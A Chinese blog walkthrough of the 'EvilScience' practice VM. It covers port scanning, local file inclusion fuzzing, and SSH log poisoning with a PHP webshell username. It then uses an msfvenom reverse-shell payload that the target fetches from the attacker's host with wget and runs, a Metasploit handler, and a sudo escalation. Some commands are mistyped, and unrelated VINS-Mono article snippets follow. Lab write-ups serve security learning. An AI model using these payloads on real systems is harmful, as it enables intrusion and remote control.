EvilScience靶机详解

已于 2024-11-01 18:47:20 修改
阅读量736 收藏 5
点赞数 15
文章标签: 网络安全
于 2024-09-22 18:16:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/a666666688/article/details/142440807
版权

主机发现

arp-scan -l

 

bfb0a5e4ed7eff3a9b0210bc4030e7ca.png

得到靶机ip

192.168.229.152

端口扫描

nmap -sV -A -T4 192.168.1.20
这段代码使用 nmap 命令来扫描目标主机 192.168.1.20,并执行以下操作:

    -sV:探测开放的端口,以确定服务/版本信息。
    -A:启用操作系统探测、版本探测、脚本扫描和跟踪路由。
    -T4:设置时间模板,用于平衡速度和准确性。

当运行这段代码时,nmap 将扫描目标主机,并尝试确定开放的端口及其对应的服务和版本信息。它还会执行一些额外的操作,如操作系统探测和跟踪路由。

输出结果将显示目标主机的详细信息,包括开放的端口、服务、版本等。

 

1d2c66164f700f1e88ff978338e60629.png

发现80和22端口是开放的,分别是ssh和http服务

服务网站

http://192.168.229.152/

 

adecb407ff7e5eae67a05cbc6af59d82.png

存在本地文件包含,找到一个邮箱,可能有用

http://192.168.229.152/index.php?file=about.php

 

045c3f427fe314ba07ebe1430db31f68.png

漏洞利用

下载 LFI-JHADDIX.txt(字典)

https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt

burpsuite抓包

 

752f380fd60c58fe2359548d4c356081.png

发送intuder爆破

 

98dd165d0989d71ede20c299aec621f9.png

 

299f23ebca65e5a7eb18c09b0ae756d1.png

 

ee6753414e781c869aba992f14a3d4a0.png

复制url访问页面

 

d2b182c92e64ca936f99295389d0ac24.png

没什么有用的信息

http://192.168.229.152/index.php?file=%2fvar%2flog%2flastlog

 

b4e26383465f353676f75afe19dabb76.png

没什么有用的信息

http://192.168.229.152/index.php?file=%2fvar%2frun%2futmp

 

7c56113e3a3cb78f7d186403ef9a74d2.png

此处存在url跳转注意一下

http://192.168.229.152/index.php?file=%2fvar%2flog%2fauth%2elog

 

53c19af26ea69561979017ea5b15c712.png

下面包含其他文件的结果

http://192.168.229.152/index.php?file=/etc/passwd

查看history

 

f0c4bab90c1e6b0af74ef2070ade37f7.png

curl -is 192.168.229.152/index.php?file=/var/log/auth.og

20230724024159.png?origin_url=https%3A%2F%2Fcdn.nlark.com%2Fyuque%2F0%2F2024%2Fpng%2F43104311%2F1726216279064-5d18c84f-737e-49a3-908f-fc71e8b0064e.png&pos_id=xQXaNb8Z

之后的步骤建议在此处打快照

ssh @root192.168.229.152

20230724024159.png?origin_url=https%3A%2F%2Fcdn.nlark.com%2Fyuque%2F0%2F2024%2Fpng%2F43104311%2F1726216649298-8328eab7-e7b0-4a26-96b1-46aeb6bf492c.png&pos_id=wfQFwIIM

此处输错密码会有错误日志存储,所以可以尝试注入

 

19cc0040b52d899744aa9bdaa395a9ac.png

注入后发现用户名被隐藏

ssh '<?php system($_GET[cmd]);?>'@192.168.229.152

 

58881d449117cffdb0141d79ad4ec314.png

msf监听

写入一句话木马

curl -is 'http://192.168.229.152/index.php?file=/var/log/auth.log&cmd=ls'

20230724024159.png?origin_url=https%3A%2F%2Fcdn.nlark.com%2Fyuque%2F0%2F2024%2Fpng%2F43104311%2F1726219110948-60294317-113b-47c2-892d-f788af35edec.png&pos_id=w3tS8AID

msf生成木马

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.229.141 LPORT

 

df9adca826efc5af5d7d064a893cf367.png

将生成的木马放入本机免杀盘,在文件处开启http服务

python -m http.server

 

b733f6cc9cfd451169bc042fd74f9d2f.png

通过浏览器上传一句话木马

http://192.168.229.152/index.php?file=var/log/auth.log&d1no=system(%27wget+192.168.110.17:7878/shell.elf%27)%3b
http://192.168.229.152/index.php?file=/var/log/auth.log&d1no=system(%27chmod+%2bx+shell.elf%27)%3b
?file=/var/log/auth.log&d1no=system('./shell.elf')%3b

kali开启监听

msfconsole
use exploit/multi/handler 
set payload linux/x86/meterpreter/reverse_tcp
set lport 5757
set lhost 192.168.229.141
run

监听成功

 

b7fccfccb256d60f9e30af34571ac9fc.png

进入交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

查看免密操作

sudo -l
sudo ./xxxlogauditorxxx.py
/var/log/auth.log | whoami

 

b9c7757ecb7cb7e480cb40d9477185b1.png

 

 

fasewer
关注
VINS_mono 代码详细理解(一)
weixin_51547017的博客
03-06 7014
一、运行命令 二、简介 VINS_mono 的代码是基于ROS写的,将slam的各个功能都封装成一个个功能包,相互之间通过发布和订阅的方向进行通信。 具体的每个功能包的内容: 三、VINS_mono代码整体框架 VINS-mono是香港科技大学开源的VIO算法,单目相机+IMU VINS的功能模块分为五个部分,分别是数据预处理、初始化、后端非线性优化、闭环检测、闭环优化。 、feature_tracker 功能包 (注:对于img_callback这里没有完全展示,要是需要更具体的可以评论) 接
VINS-Mono源码解析(一)系统框架
热门推荐
roboto
07-25 1万+
VINS-Mono源码解析(一)系统框架1. VINS-Mono 简介VINS-Mono是HKUST的Shen Shaojie团队开源的一套Visual-Inertial融合定位算法. 介绍见(https://github.com/HKUST-Aerial-Robotics/VINS-Mono), 论文里面也有.   此外,他们还开源了ios版本(https://github.com/HKUST-
vins_mono的feature_tracker线程
m0_46345373的博客
12-06 247
//新的一帧图像传入ros的回调函数中 void img_callback(const sensor_msgs::ImageConstPtr &img_msg) { 1、判断是否是第一帧 if(first_image_flag) 2、通过时间间隔判断相机数据流是否稳定,有问题则restart if (img_msg->header.stamp.toSec() - last_image_time > 1.0 || img_msg->header.stamp.toSec() &
VINS-Mono学习():关键帧和初始化
最新发布
qq_41451702的博客
03-25 854
到此,已经求解了陀螺仪零偏Bgs、所有帧在自己坐标系中的速度、第0帧的重力方向、和尺度s。①获取滑动窗口内所有图像帧相对于第l帧的位姿信息,并设置为关键帧// 计算滑窗帧的位姿Ps、Rs,并将其置为关键帧// initialStructure函数虽然计算了所有帧all_image_frame的位姿 frame_it->second.R 和frame_it->second.T,// 但是并没有存到Ps和Rs中,这里我们把这些位姿存到Ps和Rs中,并且把这些帧的is_key_frame标志位置为true。
vins-mono代码分析
anlaiji6783的博客
03-06 419
vins-mono的关键帧选择策略 1 与前一帧的平均视差。如果跟踪特征的平均视差超过某个阈值,我们会将此图像视为关键帧。 2 另一个是跟踪质量。如果跟踪特征的数量低于一个阈值,我们把这一帧看做一个新的关键帧。 具体在bool FeatureManager::addFeatureCheckParallax()中实现。 bool FeatureManager::addFea...
VINS-Mono代码分析与总结(完整版)
weixin_34235371的博客
03-27 1600
VINS-Mono代码分析总结 参考文献 1 VINS-Mono: A Robust and Versatile Monocular Visual-Inertial State Estimator, Tong Qin, Peiliang Li, Zhenfei Yang, Shaojie Shen (techincal report) 2 Solà J. Quaternion kinematics...
VINS-MONO代码解析
weixin_44884561的博客
04-26 119
VINS-MONO代码解析
VINS-Mono+Fusion源码解析系列(十一):后端processIMU与processImage
LDST_优快云的博客
10-25 777
​ 主要是维持滑窗中的预积分量pre_integrations,为后续的优化提高状态初值。
VINS-MONO代码解读---初始化1:视觉SFM详解 processImage()+initialStructure()
xiaojinger_123的博客
08-09 1249
Estimator类 视觉部分流程图 本文将重点讲解ProcessImage()函数 1.检查两帧的视差判断是否为关键帧f_manager.addFeatureCheckParallax()在feature_manager.cpp中已经解释 2.IMU预积分 IntegrationBase 在 IMU离散中值预积分中解释 3.在线标定外参 CalibrationExRotation 在线Cam到IMU的外参标定 InitialEXRotation类 中已经解释 本节将重点介绍初始化部分。 /** *
VINS-MONO代码解读---在线Cam到IMU的外参标定InitialEXRotation类
xiaojinger_123的博客
08-05 1376
本问对estimator类中最主要的函数processImage()的相机到IMU的外参矩阵的进行代码讲解。 前面两讲知识储备主要讲了IMU预积分相关的integrationBase类以及图像特征点管理器feature_manager.cpp,本节将对processImage()的相机到IMU的外参矩阵的代码讲解。 当外参完全不知道的时候,VINS也可以在线对其进行估计(rotation),先在processImage内进行初步估计,然后在后续优化时,会在optimize函数中再次优化。 目录 我们首先来回
Vins-mono 源码笔记 (5) 初始化
qq_42700518的博客
05-16 978
主要流程: 1、首先根据预积分的V的数据的均方差判断是否运动充分。 2、将 f_manager.feature中的每一个特征点 构造为 SFMFeature tmp_feature 然后保存在 sfm_f 中。 SFMFeature 结构定义在 initial_sfm.h中 struct SFMFeature { bool state; // 被三角化的状...
VINS-Mono算法梳理与代码介绍
07-20
对于VINS-Mono算法进行了梳理,结合算法对代码进行了简单介绍
VINS-Mono.pdf
03-28
一种鲁棒通用的单目视觉惯性状态估计器 , 我们首先从相机传感器提供的图像中提取特征,然后使用光流算法完成预处理。同时,在两个连续帧之间进行IMU预积分。在对所需的一切进行预处理之后,我们执行鲁棒估计初始化。
VINS-mono详细解读
weixin_30875157的博客
04-15 2664
VINS-mono详细解读 极品巧克力 前言 Vins-mono是香港科技大学开源的一个VIO算法,https://github.com/HKUST-Aerial-Robotics/VINS-Mono,是用紧耦合方法实现的,通过单目+IMU恢复出尺度,效果非常棒。 感谢他们开源,我从中学到了非常多的知识。源码总共有15000多行,我在通读完程序之后,结合参考文献,把程序背后的算法理论都...
vins-mono后端优化
m0_47240785的博客
01-22 375
预积分量约束第i,j帧的残差计算: // 计算和给定相邻帧状态量的残差 Eigen::Matrix<double, 15, 1> evaluate(const Eigen::Vector3d &Pi, const Eigen::Quaterniond &Qi, const Eigen::Vector3d &Vi, const Eigen::Vector3d &Bai, const Eigen::Vector3d &Bgi, .
VINS-Mono理论学习——后端非线性优化
Manii
06-27 1万+
本文主要介绍VINS状态估计器模块(estimator)在完成了系统初始化后,对视觉与IMU信息进行基于滑动窗口的紧耦合过程中用到的非线性优化理论。这部分对应论文第六章(VI. TIGHTLY-COUPLED MONOCULAR VIO),并参考了崔博的《VINS论文推导与代码解析》、深蓝学院的VIO课程内容。主要想对目标函数中视觉残差和IMU残差,以及对应的雅可比、协方差进行推导。
VINS-Mono 代码解析三、后端优化 第2部分
努力努力努力
11-02 1290
(2)边缘化 Marginalization 和 FEJ 一、理论部分 目标: • 控制滑窗大小,从而控制运算量 • 让滑窗中的帧有足够的视差量 • 尽可能使得矩阵稀疏,减小运算量 基于高斯牛顿的非线性优化理论可知, Hδx = b 可写成如下形式: 值得说明的是,上式中 δxa 、δxb 是希望 marg的部分和希望保留的部分。另外, VINS 中的边缘化与 G2O 计算过程中的边缘化意义不大相同(虽然处理方法一致) :G2O 中对路标点设置边缘化(pPoint->set...
VINS-Mono
香妃
09-23 1570
文章目录逐次逼近式去畸变给后端提供特征点信息光流追踪 逐次逼近式去畸变 liftProjective() 代替 OpenCV中undistortPoints() 假设现在求A点的去畸变坐标,那么我们将A的坐标直接代入畸变模型中,求得再次畸变的坐标,并求得这个坐标和A之间的距离d.因为越靠近中心这个d越小,此时肯定小于真实坐标到A的距离dt。所以我们在朝真实畸变方向(再次畸变的反方向)上加上这个d,得到一个靠近真实值的方向,在以这个点再进行一次畸变求得距离d2,d2肯定大于d小于dt。d2在加到坐标A上 得到
VINS-MONO概述
xiaojinger_123的博客
07-19 1万+
VINS-Mono是HKUST的Shen Shaojie团队开源的一套Visual-Inertial融合定位算法,https://github.com/HKUST-Aerial-Robotics/VINS-Mono,是用紧耦合方法实现的,通过单目+IMU恢复出尺度,效果很好,接下来对会该算法框架逐步解析,以便二次开发。 那么为什么要进行视觉与IMU的融合呢,自己总结的主要有以下几点: 视觉与IMU的融合可以借助IMU较高的采样频率,进而提高系统的输出频率。 视觉与IMU的融合可以提高视觉的鲁棒性,如视觉S
VINS-Mono: 实时单目视觉惯性SLAM框架
4. 自动初始化(Automatic Estimator Initialization):VINS-Mono能够自动进行初始化过程,即在开始运动之前不需要手工输入或配置初始状态,这一特性极大地方便了用户的使用。 5. 在线外参校准(Online Extrinsic ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值